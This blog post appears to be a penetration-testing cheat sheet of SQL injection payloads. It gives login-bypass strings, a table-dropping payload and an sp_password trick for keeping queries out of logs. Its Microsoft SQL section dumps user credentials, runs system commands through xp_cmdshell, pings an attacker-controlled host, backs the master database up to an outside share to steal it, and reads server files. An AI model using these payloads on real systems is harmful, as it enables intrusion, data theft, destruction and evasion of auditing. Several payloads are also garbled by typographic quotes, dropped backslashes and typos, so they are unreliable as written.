SQL-Injection Penetration Test – Bojensen Blogs
Bojensen Blogs

SQL-Injection Penetration Test

Generic – Bypass Authentication

The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).

realusername’ OR 1=1–
Authenticate as a real user without requiring a password.

‘OR ” = ‘
Allows authentication without a valid username.

admin’–
Authenticate as user admin without a password.

‘ union select 1, ‘user’, ‘pass’ 1–
Requires knowledge of column names.

‘; drop table users–
DANGEROUS! this will delete the user database if the table name is ‘users’.

Microsoft SQL

‘admin –sp_password
sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files.

  • Appending this after your comments (–) can prevent SQL Injection queries being logged.
  • select @@version
    View database version.
  • select @@servername
    Misc. information disclosure
  • select @@microsoftversion
    Misc. information disclosure
  • select * from master..sysservers
    Misc. information disclosure
  • select * from sysusers
    View database usernames and passwords.
  • exec master..xp_cmdshell ‘ipconfig+/all’
    Misc. command execution with cp_cmdshell.
  • exec master..xp_cmdshell ‘net+view’
    Misc. command execution with cp_cmdshell.
  • exec master..xp_cmdshell ‘net+users’
    Misc. command execution with cp_cmdshell.
  • exec master..xp_cmdshell ‘ping+system-controlled-by-attacker’
    Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results
  • are displayed).
  • BACKUP database master to disks='{IP}{sharename}backupdb.dat’
    Backup entire database to a file. This attack can be used to steal a database.
  • create table myfile (line varchar(8000))” bulk insert foo from ‘c:inetpubwwwrootauth.asp’” select * from myfile”–
    Reading files on the filesystem.
  • xp_servicecontrol (START or STOP)
    Start and stop Windows Services.
  • str1 + str2 OR n+n
    Concat strings for blind SQL Injection tests.

Comments are closed.